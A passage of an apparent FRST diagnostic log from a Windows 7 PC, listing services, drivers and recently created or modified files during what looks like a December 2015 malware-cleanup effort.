R2 MSI_FastBoot; C:\Program Files (x86)\MSI\Fast Boot\FastBootService.exe [105296 2015-06-04] (MSI)
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [284912 2013-10-11] ()
S2 NvNetworkService; C:\Program Files (x86)\NVIDIA Corporation\NetService\NvNetworkService.exe [1706312 2015-01-16] (NVIDIA Corporation)
S2 NvStreamSvc; C:\Program Files\NVIDIA Corporation\NvStreamSrv\nvstreamsvc.exe [21833544 2015-01-16] (NVIDIA Corporation)
R2 Qualcomm Atheros Killer Service V2; C:\Program Files\Qualcomm Atheros\Network Manager\KillerService.exe [344576 2014-04-17] (Qualcomm Atheros) [File not signed]
R2 RtkAudioService; C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe [290520 2014-01-08] (Realtek Semiconductor)
R2 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [3671792 2013-10-11] (Intel® Corporation)

===================== Drivers (Whitelisted) ==========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 BfLwf; C:\Windows\System32\DRIVERS\bflwfx64.sys [82096 2014-04-10] (Qualcomm Atheros, Inc.)
S3 busenum; C:\Windows\System32\DRIVERS\SteelBus64.sys [145408 2014-01-08] (SteelSeries Corporation) [File not signed]
S3 ebdrv; C:\Windows\system32\DRIVERS\evbda.sys [3286016 2009-06-10] (Broadcom Corporation)
R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2013-08-30] (Intel Corporation)
R3 Ke2200; C:\Windows\System32\DRIVERS\e22w7x64.sys [129200 2014-03-27] (Qualcomm Atheros, Inc.)
R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)
R3 NETwNs64; C:\Windows\System32\DRIVERS\NETwsw02.sys [3599840 2013-10-14] (Intel Corporation)
R3 NvStreamKms; C:\Program Files\NVIDIA Corporation\NvStreamSrv\NvStreamKms.sys [19784 2015-01-16] (NVIDIA Corporation)
R3 nvvad_WaveExtensible; C:\Windows\System32\drivers\nvvad64v.sys [38032 2014-11-22] (NVIDIA Corporation)
R3 RTSPER; C:\Windows\System32\DRIVERS\RtsPer.sys [466648 2014-02-21] (Realsil Semiconductor Corporation)
S3 SAlphamHid; C:\Windows\System32\DRIVERS\SAlpham64.sys [38016 2013-05-31] (SteelSeries Corporation) [File not signed]
S3 SAlphaPS2; C:\Windows\System32\DRIVERS\SAlphaPS264.sys [26496 2013-12-12] (SteelSeries Corporation) [File not signed]
S3 ssdevfactory; C:\Windows\System32\DRIVERS\ssdevfactory.sys [25088 2015-04-14] (SteelSeries ApS)
S3 catchme; \??\C:\ComboFix\catchme.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-12-26 15:37 - 2015-12-26 15:39 - 00000688 _____ C:\Users\Simon\Desktop\ADW.txt
2015-12-26 15:37 - 2015-12-26 15:37 - 00000000 _____ C:\Users\Simon\Desktop\MBAM.txt
2015-12-26 15:36 - 2015-12-26 15:36 - 00000554 _____ C:\Users\Simon\Desktop\JRT (2).txt
2015-12-26 14:33 - 2015-12-26 11:51 - 01011200 _____ C:\Users\Simon\Desktop\HAKR.exe
2015-12-26 02:14 - 2015-12-26 02:14 - 00002783 _____ C:\Users\Public\Desktop\Killer Network Manager.lnk
2015-12-26 02:14 - 2015-12-26 02:14 - 00000000 ____D C:\ProgramData\Qualcomm
2015-12-26 02:14 - 2015-12-26 02:14 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Qualcomm Atheros
2015-12-26 02:13 - 2015-12-26 02:13 - 00000000 ____D C:\Program Files\Qualcomm Atheros
2015-12-26 02:10 - 2014-04-17 11:07 - 351626480 _____ (Qualcomm Atheros) C:\Users\Simon\Desktop\KillerSuite_1.1.42.1045_Win7_Win8_Win81-MSI.exe
2015-12-26 02:08 - 2015-12-26 02:08 - 00000000 ____D C:\Program Files (x86)\Creative
2015-12-26 02:06 - 2015-12-26 02:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MSI
2015-12-26 02:06 - 2015-12-26 02:06 - 00000000 ____D C:\Program Files (x86)\MSI
2015-12-26 02:06 - 2015-12-26 02:06 - 00000000 ____D C:\MSI
2015-12-26 02:06 - 2014-04-30 16:23 - 00011248 _____ (Windows (R) Win 7 DDK provider) C:\Windows\acpimof.dll
2015-12-26 02:05 - 2015-11-04 01:50 - 00000000 ____D C:\Users\Simon\Desktop\1.0.1.8
2015-12-26 01:32 - 2015-12-26 14:36 - 00002636 _____ C:\Users\Simon\Desktop\Config.ini
2015-12-26 01:18 - 2015-12-26 01:18 - 00078119 _____ C:\Users\Simon\Desktop\hskr.enigma64
2015-12-26 01:17 - 2015-12-26 01:17 - 00001100 _____ C:\Users\Public\Desktop\The Enigma Protector x64.lnk
2015-12-26 01:17 - 2015-12-26 01:17 - 00000000 ____D C:\Users\Simon\Documents\The Enigma Protector
2015-12-26 01:17 - 2015-12-26 01:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\The Enigma Protector
2015-12-26 01:17 - 2015-12-26 01:17 - 00000000 ____D C:\Program Files (x86)\The Enigma Protector
2015-12-26 01:11 - 2015-12-26 01:17 - 18186944 _____ (The Enigma Protector Developers Team ) C:\Users\Simon\Downloads\enigma64_en_demo.exe
2015-12-26 00:21 - 2015-12-26 00:21 - 00000219 _____ C:\Users\Simon\Desktop\Counter-Strike Global Offensive.url
2015-12-26 00:21 - 2015-12-26 00:21 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2015-12-26 00:15 - 2015-12-26 00:15 - 00000967 _____ C:\Users\Public\Desktop\Steam.lnk
2015-12-26 00:15 - 2015-12-26 00:15 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2015-12-26 00:14 - 2015-12-26 00:14 - 01476720 _____ C:\Users\Simon\Downloads\SteamSetup.exe
2015-12-25 23:58 - 2015-12-26 15:58 - 00016393 _____ C:\Users\Simon\Downloads\FRST.txt
2015-12-25 23:58 - 2015-12-26 15:57 - 00000000 ____D C:\FRST
2015-12-25 23:57 - 2015-12-25 23:57 - 02370560 _____ (Farbar) C:\Users\Simon\Downloads\FRST64.exe
2015-12-25 23:34 - 2015-12-25 23:35 - 00000059 _____ C:\Users\Simon\Desktop\da.txt
2015-12-25 23:21 - 2015-12-25 23:21 - 00796864 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerApp.exe
2015-12-25 23:21 - 2015-12-25 23:21 - 00142528 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerCPLApp.cpl
2015-12-25 23:14 - 2015-12-25 23:14 - 00000000 ____D C:\Users\Simon\Desktop\Gamle Firefox-data
2015-12-25 23:13 - 2015-12-25 23:13 - 00001163 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
2015-12-25 23:13 - 2015-12-25 23:13 - 00001151 _____ C:\Users\Public\Desktop\Mozilla Firefox.lnk
2015-12-25 23:13 - 2015-12-25 23:13 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-12-25 23:13 - 2015-12-25 23:13 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox
2015-12-25 23:12 - 2015-12-25 23:12 - 00248616 _____ C:\Users\Simon\Downloads\Firefox Setup Stub 43.0.2.exe
2015-12-25 22:17 - 2015-12-26 15:35 - 00000554 _____ C:\Users\Simon\Desktop\JRT.txt
2015-12-25 22:06 - 2015-12-25 22:08 - 00000000 ____D C:\Program Files\Adware-Removal-Tool
2015-12-25 22:06 - 2015-12-25 22:06 - 00290304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\subinacl.exe
2015-12-25 22:03 - 2015-12-25 22:03 - 00000000 ___SD C:\ComboFix
2015-12-25 21:52 - 2011-06-26 07:45 - 00256000 _____ C:\Windows\PEV.exe
2015-12-25 21:52 - 2010-11-07 18:20 - 00208896 _____ C:\Windows\MBR.exe
2015-12-25 21:52 - 2009-04-20 05:56 - 00060416 _____ (NirSoft) C:\Windows\NIRCMD.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00518144 _____ (SteelWerX) C:\Windows\SWREG.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00406528 _____ (SteelWerX) C:\Windows\SWSC.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00098816 _____ C:\Windows\sed.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00080412 _____ C:\Windows\grep.exe
2015-12-25 21:52 - 2000-08-31 01:00 - 00068096 _____ C:\Windows\zip.exe
2015-12-25 21:51 - 2015-12-25 22:03 - 00000000 ____D C:\Qoobox
2015-12-25 21:51 - 2015-12-25 22:01 - 00000000 ____D C:\Windows\erdnt
2015-12-25 21:37 - 2015-12-25 21:38 - 00209654 _____ C:\TDSSKiller.3.1.0.9_25.12.2015_21.37.24_log.txt
2015-12-25 21:22 - 2015-12-26 15:42 - 00192216 _____ (Malwarebytes) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-12-25 21:21 - 2015-12-25 21:58 - 00000000 ____D C:\Users\Simon\Desktop\Malware - Bleeping Computer
2015-12-25 21:21 - 2015-12-25 21:21 - 00001106 _____ C:\Users\Public\Desktop\Malwarebytes Anti-Malware.lnk
2015-12-25 21:21 - 2015-12-25 21:21 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Malwarebytes Anti-Malware
2015-12-25 21:21 - 2015-12-25 21:21 - 00000000 ____D C:\Program Files (x86)\Malwarebytes Anti-Malware
2015-12-25 21:21 - 2015-10-05 09:50 - 00109272 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-12-25 21:21 - 2015-10-05 09:50 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-12-25 21:21 - 2015-10-05 09:50 - 00025816 _____ (Malwarebytes) C:\Windows\system32\Drivers\mbam.sys
2015-12-25 21:12 - 2015-12-26 15:36 - 00000000 ____D C:\AdwCleaner
2015-12-25 21:02 - 2015-12-25 22:16 - 00000000 ____D C:\Users\Simon\Desktop\TXT
2015-12-25 21:01 - 2015-12-25 21:02 - 00000000 ____D C:\Users\Simon\Desktop\ungdomsskole
2015-12-25 21:00 - 2015-12-25 21:03 - 00000000 ____D C:\Users\Simon\Desktop\Bilder
2015-12-23 02:41 - 2015-12-23 02:41 - 09498816 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2015-12-23 02:20 - 2015-11-20 19:54 - 03170304 _____ (Microsoft Corporation) C:\Windows\system32\wucltux.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 02609152 _____ (Microsoft Corporation) C:\Windows\system32\wuaueng.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00709632 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00192512 _____ (Microsoft Corporation) C:\Windows\system32\wuwebv.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00140288 _____ (Microsoft Corporation) C:\Windows\system32\wuauclt.exe
2015-12-23 02:20 - 2015-11-20 19:54 - 00098816 _____ (Microsoft Corporation) C:\Windows\system32\wudriver.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00091136 _____ (Microsoft Corporation) C:\Windows\system32\WinSetupUI.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wups2.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00037888 _____ (Microsoft Corporation) C:\Windows\system32\wuapp.exe
2015-12-23 02:20 - 2015-11-20 19:54 - 00036864 _____ (Microsoft Corporation) C:\Windows\system32\wups.dll
2015-12-23 02:20 - 2015-11-20 19:54 - 00012288 _____ (Microsoft Corporation) C:\Windows\system32\wu.upgrade.ps.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00573440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00174080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuwebv.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00093696 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wudriver.dll
2015-12-23 02:20 - 2015-11-20 19:34 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wups.dll
2015-12-23 02:20 - 2015-11-20 19:33 - 00035328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapp.exe
2015-12-23 02:20 - 2015-11-11 22:12 - 00387792 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll
2015-12-23 02:20 - 2015-11-11 21:52 - 00341192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll
2015-12-23 02:20 - 2015-11-11 19:53 - 01735680 _____ (Microsoft Corporation) C:\Windows\system32\comsvcs.dll
2015-12-23 02:20 - 2015-11-11 19:53 - 00525312 _____ (Microsoft Corporation) C:\Windows\system32\catsrvut.dll
2015-12-23 02:20 - 2015-11-11 19:39 - 01242624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\comsvcs.dll
2015-12-23 02:20 - 2015-11-11 19:39 - 00487936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\catsrvut.dll
2015-12-23 02:20 - 2015-11-11 17:00 - 12856832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll
2015-12-23 02:20 - 2015-11-11 16:44 - 00416256 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll
2015-12-23 02:20 - 2015-11-11 16:44 - 00279040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll
2015-12-23 02:20 - 2015-11-11 16:41 - 20366848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll
2015-12-23 02:20 - 2015-11-11 15:57 - 00076288 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll
2015-12-23 02:20 - 2015-11-10 19:55 - 01648128 _____ (Microsoft Corporation) C:\Windows\system32\DWrite.dll
2015-12-23 02:20 - 2015-11-10 19:55 - 01180160 _____ (Microsoft Corporation) C:\Windows\system32\FntCache.dll
2015-12-23 02:20 - 2015-11-10 19:55 - 01008640 _____ (Microsoft Corporation) C:\Windows\system32\user32.dll
2015-12-23 02:20 - 2015-11-10 19:39 - 01251328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\DWrite.dll
2015-12-23 02:20 - 2015-11-10 19:37 - 00833024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\user32.dll
2015-12-23 02:20 - 2015-11-10 18:47 - 03211264 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys
2015-12-23 02:20 - 2015-11-10 01:13 - 00496640 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll
2015-12-23 02:20 - 2015-11-10 01:13 - 00062464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll
2015-12-23 02:20 - 2015-11-10 01:12 - 00047616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll
2015-12-23 02:20 - 2015-11-10 01:11 - 00064000 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll
2015-12-23 02:20 - 2015-11-10 01:08 - 02280448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll
2015-12-23 02:20 - 2015-11-10 01:06 - 00047104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll
2015-12-23 02:20 - 2015-11-10 01:06 - 00030720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll
2015-12-23 02:20 - 2015-11-10 01:04 - 00476160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll
2015-12-23 02:20 - 2015-11-10 01:02 - 00663552 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript.dll
2015-12-23 02:20 - 2015-11-10 01:02 - 00620032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll
2015-12-23 02:20 - 2015-11-10 00:50 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll
2015-12-23 02:20 - 2015-11-10 00:44 - 00130048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\occache.dll
2015-12-23 02:20 - 2015-11-10 00:36 - 02050560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl
2015-12-23 02:20 - 2015-11-10 00:36 - 00687104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll
2015-12-23 02:20 - 2015-11-10 00:14 - 01311744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll
2015-12-23 02:20 - 2015-11-10 00:12 - 00710144 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll
2015-12-23 02:20 - 2015-11-08 23:33 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb
2015-12-23 02:20 - 2015-11-08 23:32 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll
2015-12-23 02:20 - 2015-11-08 23:15 - 02887168 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2015-12-23 02:20 - 2015-11-08 23:15 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll
2015-12-23 02:20 - 2015-11-08 23:06 - 00034304 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll
2015-12-23 02:20 - 2015-11-08 23:01 - 00114688 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe
2015-12-23 02:20 - 2015-11-08 22:52 - 00968704 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe
2015-12-23 02:20 - 2015-11-08 22:40 - 00077824 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll
2015-12-23 02:20 - 2015-11-08 22:32 - 00315392 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll
2015-12-23 02:20 - 2015-11-08 22:29 - 00152064 _____ (Microsoft Corporation) C:\Windows\system32\occache.dll
2015-12-23 02:20 - 2015-11-08 22:15 - 00798208 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll
2015-12-23 02:20 - 2015-11-08 22:15 - 00718336 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe
2015-12-23 02:20 - 2015-11-08 21:41 - 01546752 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll
2015-12-23 02:20 - 2015-11-05 20:05 - 00017408 _____ (Microsoft Corporation) C:\Windows\system32\wshrm.dll
2015-12-23 02:20 - 2015-11-05 20:02 - 00014848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wshrm.dll
2015-12-23 02:20 - 2015-11-05 20:02 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll
2015-12-23 02:20 - 2015-11-05 20:00 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll
2015-12-23 02:20 - 2015-11-05 10:53 - 00146944 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\rmcast.sys
2015-12-23 02:20 - 2015-11-03 20:04 - 00802304 _____ (Microsoft Corporation) C:\Windows\system32\usp10.dll
2015-12-23 02:20 - 2015-11-03 19:56 - 00627712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\usp10.dll
2015-12-23 02:19 - 2015-11-11 17:21 - 25837568 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll
2015-12-23 02:19 - 2015-11-11 16:12 - 00092160 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll
2015-12-23 02:19 - 2015-11-10 01:24 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb
2015-12-23 02:19 - 2015-11-10 01:12 - 00341504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\html.iec
2015-12-23 02:19 - 2015-11-10 01:03 - 00115712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe
2015-12-23 02:19 - 2015-11-10 00:47 - 00168960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll
2015-12-23 02:19 - 2015-11-10 00:46 - 04514816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll
2015-12-23 02:19 - 2015-11-10 00:37 - 00230400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\webcheck.dll
2015-12-23 02:19 - 2015-11-10 00:35 - 01155072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll
2015-12-23 02:19 - 2015-11-10 00:17 - 02011136 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll
2015-12-23 02:19 - 2015-11-08 23:16 - 00066560 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll
2015-12-23 02:19 - 2015-11-08 23:15 - 00571392 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll
2015-12-23 02:19 - 2015-11-08 23:15 - 00417792 _____ (Microsoft Corporation) C:\Windows\system32\html.iec
2015-12-23 02:19 - 2015-11-08 23:14 - 00088064 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll
2015-12-23 02:19 - 2015-11-08 23:07 - 00054784 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll
2015-12-23 02:19 - 2015-11-08 23:04 - 05923840 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll
2015-12-23 02:19 - 2015-11-08 23:02 - 00615936 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll
2015-12-23 02:19 - 2015-11-08 23:01 - 00817664 _____ (Microsoft Corporation) C:\Windows\system32\jscript.dll
2015-12-23 02:19 - 2015-11-08 23:01 - 00814080 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll
2015-12-23 02:19 - 2015-11-08 23:01 - 00144384 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe
2015-12-23 02:19 - 2015-11-08 22:48 - 00489984 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll
2015-12-23 02:19 - 2015-11-08 22:35 - 00199680 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll
2015-12-23 02:19 - 2015-11-08 22:18 - 00262144 _____ (Microsoft Corporation) C:\Windows\system32\webcheck.dll
2015-12-23 02:19 - 2015-11-08 22:14 - 14456832 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll
2015-12-23 02:19 - 2015-11-08 22:14 - 01359360 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll
2015-12-23 02:19 - 2015-11-08 22:13 - 02123264 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl
2015-12-23 02:19 - 2015-11-08 21:53 - 02487808 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll
2015-12-23 02:19 - 2015-11-08 21:30 - 00800768 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll
2015-12-23 02:18 - 2015-11-03 20:04 - 00241664 _____ (Microsoft Corporation) C:\Windows\system32\els.dll
2015-12-23 02:18 - 2015-11-03 19:55 - 00179712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\els.dll
2015-12-23 02:13 - 2015-12-23 02:13 - 00019320 _____ C:\Windows\System32\Tasks\{6D9AE6C4-E019-018C-C9B4-9E2714B48E10}
2015-12-07 03:52 - 2015-12-07 03:52 - 00000000 ____D C:\ProgramData\{08a2d2e5-4064-0}
2015-12-07 03:52 - 2015-12-07 03:52 - 00000000 ____D C:\ProgramData\{07fc38b7-3064-1}

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2015-12-26 15:42 - 2014-05-20 22:58 - 00000992 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-12-26 15:33 - 2014-09-26 23:46 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Spotify
2015-12-26 15:30 - 2014-06-02 00:55 - 00000000 ____D C:\Program Files (x86)\Steam
2015-12-26 14:17 - 2009-07-14 05:45 - 00025760 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-12-26 14:17 - 2009-07-14 05:45 - 00025760 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-12-26 14:09 - 2009-07-14 10:16 - 00495838 _____ C:\Windows\system32\perfh014.dat
2015-12-26 14:09 - 2009-07-14 10:16 - 00096254 _____ C:\Windows\system32\perfc014.dat
2015-12-26 14:09 - 2009-07-14 06:13 - 01365432 _____ C:\Windows\system32\PerfStringBackup.INI
2015-12-26 14:09 - 2009-07-14 04:20 - 00000000 ____D C:\Windows\inf
2015-12-26 14:03 - 2014-05-20 22:58 - 00000988 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-12-26 14:02 - 2014-09-26 23:47 - 00000000 ____D C:\Users\Simon\AppData\Local\Spotify
2015-12-26 14:02 - 2009-07-14 06:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-12-26 02:46 - 2015-04-14 02:10 - 00000000 ____D C:\Users\Simon\AppData\Local\Steam
2015-12-26 02:40 - 2014-05-21 05:03 - 00000000 ____D C:\Users\Simon\AppData\Local\CrashDumps
2015-12-26 02:14 - 2014-05-20 19:16 - 00000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2015-12-26 02:11 - 2015-05-30 13:19 - 00000000 _____ C:\Users\Simon\AppData\Local\Driver_LOM_8161Present.flag
2015-12-26 02:11 - 2014-05-20 19:54 - 00000000 ____D C:\ProgramData\Downloaded Installations
2015-12-26 02:06 - 2009-07-14 04:20 - 00000000 ____D C:\Windows
2015-12-26 01:31 - 2015-07-03 00:53 - 00000000 ____D C:\Users\Simon\Desktop\cfg
2015-12-25 23:22 - 2015-06-12 18:39 - 00000000 ____D C:\Users\Simon\AppData\Local\Adobe
2015-12-25 22:11 - 2015-04-19 23:32 - 00000000 __SHD C:\Users\Simon\AppData\LocalLow\EmieBrowserModeList
2015-12-25 22:11 - 2014-06-17 17:59 - 00000000 __SHD C:\Users\Simon\AppData\LocalLow\EmieUserList
2015-12-25 22:11 - 2014-06-17 17:59 - 00000000 __SHD C:\Users\Simon\AppData\LocalLow\EmieSiteList
2015-12-25 22:00 - 2009-07-14 03:34 - 00000215 _____ C:\Windows\system.ini
2015-12-25 22:00 - 2009-07-14 03:34 - 00000027 _____ C:\Windows\system32\Drivers\etc\hosts.old
2015-12-25 21:47 - 2014-05-20 22:59 - 00002177 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2015-12-25 21:37 - 2014-05-20 22:58 - 00003988 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-12-25 21:37 - 2014-05-20 22:58 - 00003736 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-12-25 21:33 - 2015-03-29 22:17 - 00000000 ____D C:\Program Files (x86)\Chime
2015-12-25 21:33 - 2015-01-28 23:35 - 00000000 ____D C:\Program Files (x86)\nicEdeeall
2015-12-25 21:33 - 2015-01-28 23:34 - 00000000 ____D C:\Program Files (x86)\UpDown page without arrows
2015-12-25 21:33 - 2015-01-28 23:34 - 00000000 ____D C:\Program Files (x86)\nicedeial
2015-12-25 21:17 - 2015-05-17 00:39 - 00000000 ____D C:\Users\Simon\AppData\Local\SteelSeries Engine 3 Client
2015-12-25 21:17 - 2014-05-21 05:16 - 00000000 ____D C:\Users\Simon\AppData\Local\SteelSeries_ApS
2015-12-25 21:17 - 2014-05-21 05:15 - 00000000 ____D C:\Users\Simon\AppData\Roaming\SteelSeries
2015-12-25 21:17 - 2014-05-21 05:12 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SteelSeries
2015-12-25 21:17 - 2014-05-21 05:12 - 00000000 ____D C:\ProgramData\SteelSeries
2015-12-25 21:17 - 2014-05-21 05:09 - 00000000 ____D C:\Program Files\SteelSeries
2015-12-25 21:17 - 2009-07-14 06:32 - 00000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2015-12-25 21:16 - 2014-10-07 19:03 - 00000000 ____D C:\Users\Simon\AppData\Roaming\Equalify
2015-12-25 21:15 - 2014-05-29 18:59 - 00000000 ____D C:\Users\Simon\AppData\Roaming\uTorrent
2015-12-25 21:02 - 2015-07-03 21:25 - 00072415 _____ C:\Users\Simon\Desktop\cfg.rar
2015-12-25 20:45 - 2009-07-14 05:45 - 04951560 _____ C:\Windows\system32\FNTCACHE.DAT
2015-12-25 20:42 - 2015-04-14 12:16 - 00000000 ___SD C:\Windows\SysWOW64\GWX
2015-12-25 20:42 - 2015-04-14 12:16 - 00000000 ___SD C:\Windows\system32\GWX
2015-12-23 03:13 - 2014-05-20 19:25 - 01341938 _____ C:\Windows\SysWOW64\PerfStringBackup.INI
2015-12-23 03:06 - 2014-05-20 21:51 - 00000000 ____D C:\Windows\system32\MRT
2015-12-23 03:02 - 2014-05-20 21:51 - 140158008 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-12-07 03:29 - 2014-12-24 22:10 - 00000000 ____D C:\Windows\system32\appraiser
2015-12-07 03:29 - 2014-05-21 14:11 - 00000000 ___SD C:\Windows\system32\CompatTel
